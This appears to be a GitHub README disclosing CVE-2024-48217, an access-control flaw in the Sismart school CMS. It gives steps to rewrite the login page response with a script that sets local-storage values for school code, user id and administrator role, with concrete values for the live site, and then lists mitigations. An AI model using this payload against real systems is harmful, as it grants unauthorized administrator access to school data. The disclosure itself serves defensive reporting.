Skip to content

ajrielrm/CVE-2024-48217

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits
README.md
README.md
 
 

Repository files navigation

CVE-2024-48217 Sismart Vulnerability

CVE Assigned: CVE-2024-48217 mitre.org nvd.nist.org tenable.com

Date:

5 September 2024

Author:

Ajriel Rizqy Maulana

Software Link:

Version:

7.4.0

Vulnerability:

IDOR - Inside the Session Storage IDOR stands for Insecure Direct Object Reference which is a vulnerability that falls under the broken access control category. In brief, this vulnerability arises when an application uses user-supplied input to access an object directly. Using insecure direct object reference vulnerability it is possible to gain horizontal privilege escalation and in some cases it can lead to vertical privilege escalation as well.

Affected Components:

https://cms.sismart.id/sekolah/ sekolah_kode parameter within the Local Storage. user_id parameter within the Local Storage. user_level parameter within the Local Storage.

Description:

Unlike normal IDORs, the IDORs with session storage are different in nature as they do not make permanent changes at times however the severity is still the same.

Steps to reproduce:

Unmodified HTTP Response:

HTTP/2 200 OK
Date: Fri, 01 Nov 2024 11:44:22 GMT
Content-Type: text/html
Last-Modified: Mon, 01 May 2023 02:36:30 GMT
Cf-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KJnz9T9%2FG1GNLgvfWtpZFaY10aFkzyrkTUNVdK34tYTcoWnGvxnG7y9lQi%2BxdFQ%2Bd4jjab38wLGtsgIlOxaBbo2TvjTKA6newy7qBGD8jQKTwH9xSM9PVgmnNdHodgx0ew%3D%3D"}],"group":"cf-nel","max_age":604800}
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
Cf-Ray: 8dbba1ea4a99658f-SIN
Alt-Svc: h3=":443"; ma=86400
Server-Timing: cfL4;desc="?proto=TCP&rtt=32972&sent=758&recv=340&lost=0&retrans=102&sent_bytes=994646&recv_bytes=2733&delivery_rate=2462437&cwnd=257&unsent_bytes=0&cid=706fd40c05668fc1&ts=24672&x=0"

<!doctype html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><link href="https://fonts.googleapis.com/css?family=Poppins:300,400,500,600,700|Roboto:300,400,500,600,700|Material+Icons" rel="stylesheet"><link rel="stylesheet" href="https://unicons.iconscout.com/release/v4.0.0/css/line.css"/><title>Sismart | Login</title><script defer="defer" type="module" src="/js/chunk-vendors.fd6f44e8.js"></script><script defer="defer" type="module" src="/js/app.741d68f7.js"></script><link href="/css/chunk-vendors.582cc66a.css" rel="stylesheet"><link href="/css/app.d5b7c7c2.css" rel="stylesheet"><script defer="defer" src="/js/chunk-vendors-legacy.fd6f44e8.js" nomodule></script><script defer="defer" src="/js/app-legacy.350b7c53.js" nomodule></script></head><body style="--kt-toolbar-height:55px;--kt-toolbar-height-tablet-and-mobile:55px"><noscript><strong>We're sorry but metronic-vue doesn't work properly without JavaScript enabled. Please enable it to continue.</strong></noscript><div id="app" class="d-flex flex-column flex-root"></div><script src="https://requirejs.org/docs/release/2.1.15/minified/require.js"></script><script src="https://rawgit.com/ironwallaby/delaunay/master/delaunay.js"></script></body></html>
  • Step 3 - Add a script to modify the Local Storage and redirect to /sekolah:
    • Set the sekolah_kode to the desired school code.
    • Set the user_id to the desired administrator's user id.
    • Set the user_level to administrator.
    • Set the id_token to undefined.
    • Edit the Response and set all of the above with this javascript script :
    <script>
  localStorage.setItem('sekolah_kode', 'school_id');
  localStorage.setItem('user_id', '0000');
  localStorage.setItem('user_level', 'role (ex:administrator)');
  localStorage.setItem('id_token', 'undefined');
  window.location.href = '/sekolah';
</script>

Modified HTTP Response:

HTTP/2 200 OK
Date: Fri, 01 Nov 2024 11:44:22 GMT
Content-Type: text/html
Last-Modified: Mon, 01 May 2023 02:36:30 GMT
Cf-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KJnz9T9%2FG1GNLgvfWtpZFaY10aFkzyrkTUNVdK34tYTcoWnGvxnG7y9lQi%2BxdFQ%2Bd4jjab38wLGtsgIlOxaBbo2TvjTKA6newy7qBGD8jQKTwH9xSM9PVgmnNdHodgx0ew%3D%3D"}],"group":"cf-nel","max_age":604800}
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
Cf-Ray: 8dbba1ea4a99658f-SIN
Alt-Svc: h3=":443"; ma=86400
Server-Timing: cfL4;desc="?proto=TCP&rtt=32972&sent=758&recv=340&lost=0&retrans=102&sent_bytes=994646&recv_bytes=2733&delivery_rate=2462437&cwnd=257&unsent_bytes=0&cid=706fd40c05668fc1&ts=24672&x=0"

<!doctype html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><link href="https://fonts.googleapis.com/css?family=Poppins:300,400,500,600,700|Roboto:300,400,500,600,700|Material+Icons" rel="stylesheet"><link rel="stylesheet" href="https://unicons.iconscout.com/release/v4.0.0/css/line.css"/><title>Sismart | Login</title><script defer="defer" type="module" src="/js/chunk-vendors.fd6f44e8.js"></script><script defer="defer" type="module" src="/js/app.741d68f7.js"></script><link href="/css/chunk-vendors.582cc66a.css" rel="stylesheet"><link href="/css/app.d5b7c7c2.css" rel="stylesheet"><script defer="defer" src="/js/chunk-vendors-legacy.fd6f44e8.js" nomodule></script><script defer="defer" src="/js/app-legacy.350b7c53.js" nomodule></script></head><body style="--kt-toolbar-height:55px;--kt-toolbar-height-tablet-and-mobile:55px"><noscript><strong>We're sorry but metronic-vue doesn't work properly without JavaScript enabled. Please enable it to continue.</strong></noscript><div id="app" class="d-flex flex-column flex-root"></div><script src="https://requirejs.org/docs/release/2.1.15/minified/require.js"></script><script src="https://rawgit.com/ironwallaby/delaunay/master/delaunay.js"></script>
<script>
       localStorage.setItem('sekolah_kode', 'smkbnif');
    localStorage.setItem('user_id', '3301');
    localStorage.setItem('user_level', 'administrator');
    localStorage.setItem('id_token', 'undefined');
     window.location.href = '/sekolah';
</script>

</body></html>
  • Step 4 - Forward the response

Proof of Concept:

image

Mitigation:

An access check must be conducted, ensuring verification of all referenced objects. Additionally, authentication and authorization checks should be implemented. Furthermore, IDs should be converted to alphanumeric formats to prevent guessability for example use uid.

References

About

CVE-2024-48217 Sismart Vulnerability

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published